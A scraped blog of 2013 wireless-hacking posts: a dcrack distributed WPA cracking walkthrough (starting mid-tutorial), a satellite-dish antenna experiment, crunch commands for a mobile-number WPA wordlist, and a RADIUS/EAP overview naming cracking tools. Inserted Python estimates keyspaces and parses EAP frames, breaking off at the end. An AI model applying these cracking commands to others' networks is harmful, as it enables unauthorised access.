<b>python dcrack.py cmd 192.168.1.128 dict /root/password.lst</b></blockquote>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-n3L3eRVIinA/UebHTkGvzvI/AAAAAAAAAV8/DOlPOCe_TRE/s1600/dcrack-user.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-n3L3eRVIinA/UebHTkGvzvI/AAAAAAAAAV8/DOlPOCe_TRE/s1600/dcrack-user.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>USER LOG ON SERVER</b> (user sending the files to the server)</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-y7--NV5aZRk/UebHR4qrGXI/AAAAAAAAAVo/6PeXcwsfKA4/s1600/dcrack-server-user.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://3.bp.blogspot.com/-y7--NV5aZRk/UebHR4qrGXI/AAAAAAAAAVo/6PeXcwsfKA4/s1600/dcrack-server-user.png" /></a></div>
<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>NOTE: The wordlist and the .cap file are compressed first to reduce the size to send it over the network. </b></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>Third</b>, both clients (CLIENT 1 and CLIENT 2) need to tell the server that they are available for cracking. </div>
<blockquote class="tr_bq" style="text-align: center;">
<b>python dcrack.py client 192.168.1.128</b></blockquote>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>CLIENT 1</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-pyjoskyWAHI/UebHPOuO4oI/AAAAAAAAAU4/QJEFHn_RSwI/s1600/dcrack-server-client-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-pyjoskyWAHI/UebHPOuO4oI/AAAAAAAAAU4/QJEFHn_RSwI/s1600/dcrack-server-client-1.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>CLIENT 1 LOG ON SERVER</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-302AUGnuEuE/UebHOZA-9HI/AAAAAAAAAUk/5BPnT8LMJig/s1600/dcrack-server-client-1-log.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-302AUGnuEuE/UebHOZA-9HI/AAAAAAAAAUk/5BPnT8LMJig/s1600/dcrack-server-client-1-log.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>CLIENT 2</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-BVXzJD2Jsdo/UebHQp5HDPI/AAAAAAAAAVM/Agx2cC0SpNc/s1600/dcrack-server-client-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-BVXzJD2Jsdo/UebHQp5HDPI/AAAAAAAAAVM/Agx2cC0SpNc/s1600/dcrack-server-client-2.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>CLIENT 2 LOG ON SERVER</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-SKlRJGYJw5E/UebHQrLCZyI/AAAAAAAAAVI/DUXck1oMAMQ/s1600/dcrack-server-client-2-log.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-SKlRJGYJw5E/UebHQrLCZyI/AAAAAAAAAVI/DUXck1oMAMQ/s1600/dcrack-server-client-2-log.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Now, the user needs to send the cracking request to the server.</div>
<blockquote class="tr_bq" style="text-align: center;">
<b>python dcrack.py cmd 192.168.1.128 crack 00:0d:93:eb:b0:8c</b></blockquote>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-4Yec1rgY38g/UebHR96tu9I/AAAAAAAAAVY/Tz3dh8LLF-c/s1600/dcrack-user-crack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-4Yec1rgY38g/UebHR96tu9I/AAAAAAAAAVY/Tz3dh8LLF-c/s1600/dcrack-user-crack.png" /></a></div>
<div style="text-align: center;">
<b>USER LOG ON SERVER</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-XT9-vYkCO-E/UebHR8LxHlI/AAAAAAAAAVg/TsnP6mONxSQ/s1600/dcrack-user-crack-log.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-XT9-vYkCO-E/UebHR8LxHlI/AAAAAAAAAVg/TsnP6mONxSQ/s1600/dcrack-user-crack-log.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Once the user requests cracking from the server, the clients start downloading the wordlist and the .cap file from the server. The clients then uncompress the files, <b>split the wordlist into 2 parts</b> (as we have 2 clients here) and start cracking using their own computing power.</div>
<div style="text-align: center;">
<br /></div>
<br />
<div style="text-align: center;">
<b>CLIENT 1</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ZD3VNKIwqKk/UebHOzS0jOI/AAAAAAAAAUw/EazglpExrAM/s1600/dcrack-server-client-1-cracking.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-ZD3VNKIwqKk/UebHOzS0jOI/AAAAAAAAAUw/EazglpExrAM/s1600/dcrack-server-client-1-cracking.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>CLIENT 2</b></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-kTa-3hMOoSs/UebHPbuU-AI/AAAAAAAAAU8/nvfVKt9ogek/s1600/dcrack-server-client-2-cracking.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-kTa-3hMOoSs/UebHPbuU-AI/AAAAAAAAAU8/nvfVKt9ogek/s1600/dcrack-server-client-2-cracking.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>CLIENT 1 LOG ON SERVER</b> (Client sending the password to the server)</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/--zGnWxFHgf0/UebHShYBiZI/AAAAAAAAAVw/g7p7w7gfmAo/s1600/dcrack-user-status-log.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/--zGnWxFHgf0/UebHShYBiZI/AAAAAAAAAVw/g7p7w7gfmAo/s1600/dcrack-user-status-log.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
As you can see above, CLIENT 1 found the key in the wordlist.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
The user can check the status of the cracking with the following command:</div>
<br />
<blockquote class="tr_bq" style="text-align: center;">
<b>python dcrack.py cmd 192.168.1.128 status</b></blockquote>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Bb4jfhtl-BM/UebHS0ZkZdI/AAAAAAAAAV0/6HD5Koygtvw/s1600/dcrack-user-status.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-Bb4jfhtl-BM/UebHS0ZkZdI/AAAAAAAAAV0/6HD5Koygtvw/s1600/dcrack-user-status.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Phew!!</div>
<div style="text-align: center;">
Too long... ha ha :D</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
That's all, guys... I hope you like it.</div>
<div><b>EXPERIMENT -- Connecting Alfa card with the "Satellite dish antenna"</b> (posted 2013-05-16)</div><br />
Yesterday I was experimenting with the Alfa card, and what I found was quite exciting.<br />
<br />
I removed the antenna from the Alfa card and connected the card to my laptop without the antenna to check the networks in the vicinity.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Z3GUAv72MhI/UZSS48f788I/AAAAAAAAASs/jkEipI4dCI8/s1600/IMAG0087.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://1.bp.blogspot.com/-Z3GUAv72MhI/UZSS48f788I/AAAAAAAAASs/jkEipI4dCI8/s640/IMAG0087.jpg" width="640" /></a></div>
<br />
<br />
I got only a single network, and that was my home wireless network.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-yQRq9SYaDKw/UZST2ux1PgI/AAAAAAAAAS4/32NUZoMqx4w/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://2.bp.blogspot.com/-yQRq9SYaDKw/UZST2ux1PgI/AAAAAAAAAS4/32NUZoMqx4w/s640/1.png" width="640" /></a></div>
<br />
The airodump result:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-p3aA57p0q_A/UZSh1sQ1YDI/AAAAAAAAATg/Yj_roSzXJCk/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://2.bp.blogspot.com/-p3aA57p0q_A/UZSh1sQ1YDI/AAAAAAAAATg/Yj_roSzXJCk/s640/2.png" width="640" /></a></div>
<br />
<br />
Signal and Noise Level:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Dc7ZB5HxkRg/UZShssMgSII/AAAAAAAAATQ/lAsX3elBm-o/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://3.bp.blogspot.com/-Dc7ZB5HxkRg/UZShssMgSII/AAAAAAAAATQ/lAsX3elBm-o/s640/1.png" width="640" /></a></div>
<br />
<br />
<br />
After that I followed these steps:<br />
<br />
1. I removed the dish antenna cable connected to the set-top box.<br />
<br />
2. I bound the male connector of the satellite dish antenna cable (the one that connects to the set-top box) to a copper wire (of the kind used in earphones) using a plastic clip.<br />
<br />
3. I then bound the other end of the copper wire to the Alfa card's male connector.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-W1TAhIgkd7U/UZSSzUr6QxI/AAAAAAAAASc/1G6dGPEAeys/s1600/IMAG0085.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://4.bp.blogspot.com/-W1TAhIgkd7U/UZSSzUr6QxI/AAAAAAAAASc/1G6dGPEAeys/s640/IMAG0085.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ubgAh7ONfq8/UZSSy2KBm7I/AAAAAAAAASU/dP5lOna7FN4/s1600/IMAG0086.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://4.bp.blogspot.com/-ubgAh7ONfq8/UZSSy2KBm7I/AAAAAAAAASU/dP5lOna7FN4/s640/IMAG0086.jpg" width="640" /></a></div>
<br />
<br />
Now I know it's kind of weird, but after setting this up I connected the Alfa card to my laptop and guess what? I was able to see 3 networks with a high signal range.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-xNdH1E0kZHw/UZSS0wzIjPI/AAAAAAAAASk/XgSpd9-goPM/s1600/IMAG0084.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://4.bp.blogspot.com/-xNdH1E0kZHw/UZSS0wzIjPI/AAAAAAAAASk/XgSpd9-goPM/s640/IMAG0084.jpg" width="360" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-hGDGNmw89L4/UZST41EXLkI/AAAAAAAAATA/9P0iTKahkRs/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://2.bp.blogspot.com/-hGDGNmw89L4/UZST41EXLkI/AAAAAAAAATA/9P0iTKahkRs/s640/2.png" width="640" /></a></div>
<br />
<br />
Airodump result:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-phlW0vzLk4c/UZSh3BugYxI/AAAAAAAAATo/LE6owTwVhMg/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://1.bp.blogspot.com/-phlW0vzLk4c/UZSh3BugYxI/AAAAAAAAATo/LE6owTwVhMg/s640/4.png" width="640" /></a></div>
<br />
<br />
Signal and Noise Level:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6miOhI3eFW8/UZShuKqiYiI/AAAAAAAAATY/01-FtjPamTE/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://3.bp.blogspot.com/-6miOhI3eFW8/UZShuKqiYiI/AAAAAAAAATY/01-FtjPamTE/s640/3.png" width="640" /></a></div>
<br />
<br />
I am still doing some experiments to increase the gain of the antenna.<br />
<div><b>WPA/WPA2 cracking dictionary. Human Stupidity !!</b> (posted 2013-04-16)</div><br />
<div style="text-align: center;">
Hi guys,</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
I have seen so many threads related to WPA cracking using a dictionary, so I thought I should share some of my techniques by which you can increase the chance of getting the WPA/WPA2 password.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
In India (I don't know about other countries), I have seen many people using wifi with WPA/WPA2 encryption enabled, which is good actually. Yes, I know it's hard for a hacker to crack a WPA/WPA2 password when he/she doesn't have a proper dictionary, but there is one thing that many guys forget: the "Human Stupidity" factor :D</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
People may have secured their wifi with WPA/WPA2 encryption, but one thing I have noticed so far is that many people choose as their wifi password their<b> own mobile number</b> or their <b>gf's, wife's, parents' or relatives' mobile number.</b></div>
<div style="text-align: center;">
We only need to create a dictionary consisting of all the mobile numbers. You think it's hard?</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Actually it's kind of easy!! :D :D</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Thinking how?</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Let's see,</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
As I said earlier, people choose a mobile number for their password, so we'll create a dictionary containing the mobile numbers.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Now let's say there's a phone number like 9876543211</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
(there are many series like 99XX, 98XX, 97XX etc.)</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
We just need to create a dictionary of numbers starting with 9 (for the 9 series; for the 7 or 8 series you can add 7 or 8 as well), where only the other 9 digits change and the 1st digit stays the same.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
For creating the dictionary you can use "crunch" (a really nice tool). The total size for all 10-digit numbers (digits 0987654321) is 102GB, but you only need to create a dictionary for 9 digits, as the 1st digit remains the same, so the size would be only 10GB.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">How to use crunch to create this kind of dictionary?</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Let's see then,</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
First you need to go to the</div>
<div style="text-align: center;">
<br /></div>
<blockquote class="tr_bq" style="text-align: center;">
<span style="color: purple;"><b>/pentest/passwords/crunch/ directory</b></span></blockquote>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Then you have to type</div>
<div style="text-align: center;">
<br /></div>
<blockquote class="tr_bq" style="text-align: center;">
<span style="color: purple;"><b> ./crunch 10 10 -t 9%%%%%%%%% -o wordlist.lst</b></span></blockquote>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
What you're asking crunch to do is create a dictionary with a minimum and maximum length of 10 digits, keep the 1st digit unchanged (it stays 9) and vary the other 9 digits, and finally store the output to a file (in this case wordlist.lst).</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
The above command will generate a dictionary of 10GB in size which you can use to crack WPA/WPA2 passwords.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
That's all!</div>
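As an added example (not the post's own code), here is a small Python estimator that reproduces the post's arithmetic for crunch -t patterns and, from the network owner's side, flags a WPA passphrase that falls inside such a cheap keyspace. The 7/8/9 mobile series, the "pattern length plus newline" line size and the key-test rate are assumptions of this example.

```python
import re

# Crunch's -t placeholder classes (crunch defaults, assumed here):
# % = digit, @ = lowercase letter, , = uppercase letter.  '^' (symbols) is
# left unsupported so we never guess the symbol-set size.
CRUNCH_CLASSES = {"%": 10, "@": 26, ",": 26}

# Indian mobile numbers are 10 digits; the post names the 7, 8 and 9 series.
MOBILE_RE = re.compile(r"^[7-9][0-9]{9}$")


def crunch_keyspace(pattern: str) -> int:
    """Number of candidates 'crunch N N -t PATTERN' emits (N == len(pattern))."""
    count = 1
    for ch in pattern:
        if ch == "^":
            raise ValueError("symbol placeholder '^' is not supported here")
        count *= CRUNCH_CLASSES.get(ch, 1)  # a literal character contributes 1
    return count


def wordlist_bytes(pattern: str) -> int:
    """On-disk size: each candidate is the pattern length plus one newline byte."""
    return crunch_keyspace(pattern) * (len(pattern) + 1)


def gib(n_bytes: int) -> float:
    """Bytes to GiB, the unit in which the post's 10GB / 102GB figures line up."""
    return n_bytes / 2 ** 30


def crack_seconds(keyspace: int, keys_per_second: float) -> float:
    """Worst-case time to exhaust the keyspace at a given WPA key-test rate."""
    return keyspace / keys_per_second


def weak_wpa_passphrase(passphrase: str):
    """Return why a passphrase is cheap to guess, or None if none of the
    post's patterns apply.  Check order matters: a mobile number is also
    all-digits, so the more specific reason is reported first."""
    if MOBILE_RE.match(passphrase):
        return "10-digit mobile number: inside the 9%%%%%%%%% keyspace (1e9)"
    if passphrase.isdigit():
        return f"digits only: keyspace is 10^{len(passphrase)}"
    if len(passphrase) < 12:
        return "shorter than 12 characters"
    return None


if __name__ == "__main__":
    for pattern in ("9%%%%%%%%%", "%" * 10):
        print(f"{pattern}: {crunch_keyspace(pattern):,} candidates, "
              f"{gib(wordlist_bytes(pattern)):.1f} GiB on disk")
    # Assumed rate: a few hundred thousand WPA PBKDF2 checks per second.
    hours = crack_seconds(crunch_keyspace("9%%%%%%%%%"), 300_000) / 3600
    print(f"worst case at 300k keys/s: {hours:.2f} hours")
    for pp in ("9876543211", "20130416", "Tr0ub4dor&3-wifi-2013"):
        print(pp, "->", weak_wpa_passphrase(pp))
```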
<div><b>RADIUS Server !!</b> (posted 2013-03-23)</div><br />
<br />
<br />
<br />
<div style="text-align: center;">
<span style="font-size: x-large;">What is a RADIUS server?</span></div>
<div style="text-align: center;">
It is a server used to authenticate clients using the RADIUS (Remote Authentication Dial In User Service) client/server protocol. It follows the AAA (Authentication, Authorization, Accounting) concept. RADIUS servers are used by many companies, organizations, universities and especially ISPs. When you dial in to the ISP you must enter your username and password. This information is passed to a RADIUS server, which checks that the information is correct and then authorizes access to the ISP system. It uses UDP port 1812 for RADIUS Authentication and 1813 for RADIUS Accounting.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-large;">Why is a RADIUS server used?</span></div>
<div style="text-align: center;">
RADIUS serves three functions:</div>
<div style="text-align: center;">
1. to authenticate users or devices before granting them access to a network,</div>
<div style="text-align: center;">
2. to authorize those users or devices for certain network services and</div>
<div style="text-align: center;">
3. to account for usage of those services.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-large;">RADIUS server in Wireless Networks.</span></div>
<div style="text-align: center;">
A RADIUS server used in wireless networks manages the wireless clients; for wireless, it uses the 802.1X authentication scheme. The big advantage of WPA/WPA2-RADIUS authentication is that the wireless encryption keys are issued by the RADIUS server and are unique to each connection and session. That eliminates distributing a shared key to all users, which might easily be compromised. The RADIUS protocol does not transmit passwords in cleartext between the NAS and the RADIUS server. Rather, a shared secret is used along with the MD5 hashing algorithm to obfuscate passwords.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-large;">Difference between WPA-Enterprise and WPA2-Enterprise.</span></div>
<div style="text-align: center;">
The main difference between WPA-Enterprise and WPA2-Enterprise is the same as between WPA-Personal and WPA2-Personal, except that in Enterprise mode both need a RADIUS server to authenticate the client.</div>
<div style="text-align: center;">
*NOTE: WPA uses the TKIP cipher with the MD5 hashing algorithm, but WPA2 uses the AES-CCMP cipher with the SHA1 hashing algorithm.</div>
<div style="text-align: center;">
It is generally recommended to choose WPA2-Enterprise over WPA-Enterprise.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-large;">Types of Authentication Mechanism in RADIUS server.</span></div>
<div style="text-align: center;">
There are many authentication mechanisms for a RADIUS server, but the most common and widely used are as follows:</div>
<div style="text-align: center;">
EAP-MD5</div>
<div style="text-align: center;">
LEAP </div>
<div style="text-align: center;">
EAP-TLS</div>
<div style="text-align: center;">
PEAP</div>
<div style="text-align: center;">
EAP-TTLS and </div>
<div style="text-align: center;">
EAP-FAST </div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">EAP-MD5</span></div>
<div style="text-align: center;">
EAP-MD5-Challenge enables a RADIUS server to authenticate a connection request by verifying an MD5 hash of a user's password. The server sends the client a random challenge value, and the client proves its identity by hashing the challenge and its password with MD5. EAP-MD5-Challenge is typically used on trusted networks where the risk of packet sniffing or active attack is fairly low. Because of significant security vulnerabilities, EAP-MD5-Challenge is not usually used on public or wireless networks, since third parties can capture packets and apply dictionary attacks to the password hashes. Because EAP-MD5-Challenge does not provide server authentication, it is vulnerable to spoofing (a third party advertising itself as an access point).</div>
<div style="text-align: center;">
Tools to crack this authentication mechanism: eapmd5pass, eapmd5crack</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
By default, the EAP-MD5-Challenge password protocol is available for use by the Native and Unix authentication methods.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">LEAP (Lightweight Extensible Authentication Protocol)</span></div>
<div style="text-align: center;">
LEAP was developed by Cisco Systems. LEAP uses a modified version of MS-CHAP (Microsoft's version of the Challenge-Handshake Authentication Protocol), an authentication protocol in which user credentials are not strongly protected and are thus easily compromised.</div>
<div style="text-align: center;">
Tools to crack this authentication mechanism: ASLEAP, THC-leapcracker</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Cisco recommends using newer and stronger EAP protocols such as EAP-FAST, PEAP, or EAP-TLS.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">EAP-TLS (EAP-Transport Layer Security)</span></div>
<div style="text-align: center;">
EAP-TLS uses the Transport Layer Security (TLS) protocol. EAP-TLS requires the client to use X.509 certificates. TLS is generally accepted as the most secure option because it depends on certificates. A compromised password is not enough to break into EAP-TLS enabled systems, because the intruder still needs the client-side private key (certificate). The highest security available is when client-side keys are housed in "smart cards", because there is no way to steal a certificate's corresponding private key from a smart card without stealing the card itself.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">PEAP (Protected Extensible Authentication Protocol)</span></div>
<div style="text-align: center;">
PEAP is similar to EAP-TTLS. It encapsulates EAP within a potentially encrypted and authenticated Transport Layer Security (TLS) tunnel. PEAP requires only a server-side PKI (Public Key Infrastructure) certificate to create a secure TLS tunnel that protects user authentication, and uses the server-side public key certificate to authenticate the server. It then creates an encrypted TLS tunnel between the client and the authentication server.</div>
<div style="text-align: center;">
Tool to crack this authentication mechanism: ASLEAP</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">EAP-TTLS (EAP-Tunneled Transport Layer Security)</span></div>
<div style="text-align: center;">
EAP-TTLS (Tunneled Transport Layer Security) is designed to provide authentication as strong as EAP-TLS, but it does not require that each user be issued a certificate. Instead, only the authentication servers are issued certificates. User authentication is performed by password, but the password credentials are transported in a securely encrypted tunnel established using the server certificates. It does not require that the client authenticate to the server with a certificate digitally signed by the CA. The server uses the secure TLS tunnel to authenticate the client with a password and key exchange mechanism. TTLS implementations today support all methods defined by EAP, as well as several older methods (CHAP, PAP, MS-CHAP and MS-CHAPv2).</div>
<div style="text-align: center;">
Tool to crack this authentication mechanism: ASLEAP</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">EAP-FAST (EAP-Flexible Authentication via Secure Tunneling)</span></div>
<div style="text-align: center;">
It was designed as a replacement for LEAP. EAP-FAST uses a Protected Access Credential (PAC) to establish a TLS tunnel in which client credentials are verified. When automatic PAC provisioning is enabled, EAP-FAST has a slight vulnerability: an attacker can intercept the PAC and subsequently use it to compromise user credentials. There is also a vulnerability where an attacker's AP can use the same SSID, reject the user's PAC and supply a new one. Most supplicants can be set to prompt the user for credentials, which are then sent via the inner method to the attacker, who gets either a cleartext password or an MSCHAPv2 hash that is vulnerable to dictionary attack.</div>
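As an added example (not from the post), the following Python parses constructed EAPOL/EAP-Request frames, reports which of the methods listed above an authenticator is offering and whether the post classes them as crackable from a capture, and shows the MD5-Challenge computation a RADIUS server verifies. The sample frames, password and challenge are constructed for this example.

```python
import hashlib
import struct

# IANA EAP method type numbers for the methods discussed in the post.
EAP_TYPES = {1: "Identity", 4: "MD5-Challenge", 13: "TLS", 17: "LEAP",
             21: "TTLS", 25: "PEAP", 43: "FAST"}
# Methods whose challenge/response can be attacked offline from a capture.
WEAK_TYPES = {4, 17}

EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4


def parse_eapol(frame: bytes):
    """Parse one EAPOL frame.  Returns (code, identifier, eap_type, type_data)
    for an EAP-Packet, or None for other EAPOL types (Start, Logoff, Key)."""
    if len(frame) < 4:
        raise ValueError("truncated EAPOL header")
    _version, packet_type, body_len = struct.unpack("!BBH", frame[:4])
    if packet_type != 0:          # 0 = EAP-Packet
        return None
    body = frame[4:4 + body_len]
    if len(body) < 4:
        raise ValueError("truncated EAP header")
    code, ident, length = struct.unpack("!BBH", body[:4])
    if length > len(body) or length < 4:
        raise ValueError("EAP length field inconsistent with EAPOL body")
    if code in (EAP_SUCCESS, EAP_FAILURE):
        return code, ident, None, b""   # Success/Failure carry no Type byte
    if length < 5:
        raise ValueError("Request/Response without Type byte")
    return code, ident, body[4], body[5:length]


def md5_challenge_fields(type_data: bytes):
    """Split MD5-Challenge Type-Data into (challenge, name) (RFC 3748 5.4)."""
    size = type_data[0]
    return type_data[1:1 + size], type_data[1 + size:]


def eap_md5_response(identifier: int, password: bytes, challenge: bytes) -> bytes:
    """The value the peer returns: MD5(Identifier || password || challenge).
    Everything except the password is visible on the wire, which is why a
    captured exchange allows an offline dictionary attack (one MD5 per guess)."""
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()


def verify_md5_response(identifier, password, challenge, response) -> bool:
    """What the RADIUS server does: recompute and compare.  Note the server
    must hold the cleartext password to do this."""
    return eap_md5_response(identifier, password, challenge) == response


def offered_methods(frames):
    """Return [(method name, weak?)] for each EAP-Request in a capture,
    skipping Identity requests, which precede every method."""
    out = []
    for frame in frames:
        parsed = parse_eapol(frame)
        if parsed is None:
            continue
        code, _ident, eap_type, _data = parsed
        if code == EAP_REQUEST and eap_type not in (None, 1):
            out.append((EAP_TYPES.get(eap_type, f"type-{eap_type}"),
                        eap_type in WEAK_TYPES))
    return out


# --- constructed sample capture (not real traffic) -------------------------
def eapol(eap: bytes) -> bytes:
    return struct.pack("!BBH", 2, 0, len(eap)) + eap        # EAPOL v2, EAP-Packet


def eap_request(ident: int, eap_type: int, type_data: bytes) -> bytes:
    return (struct.pack("!BBH", EAP_REQUEST, ident, 5 + len(type_data))
            + bytes([eap_type]) + type_data)


CHALLENGE = bytes(range(16))
SAMPLE_FRAMES = [
    eapol(eap_request(1, 1, b"")),                                       # Identity
    eapol(eap_request(2, 4, bytes([16]) + CHALLENGE + b"radius")),       # MD5-Challenge
    eapol(eap_request(3, 25, bytes([0x20]))),                            # PEAP start
    eapol(eap_request(4, 17, bytes([1, 0, 8]) + CHALLENGE[:8] + b"srv")),  # LEAP
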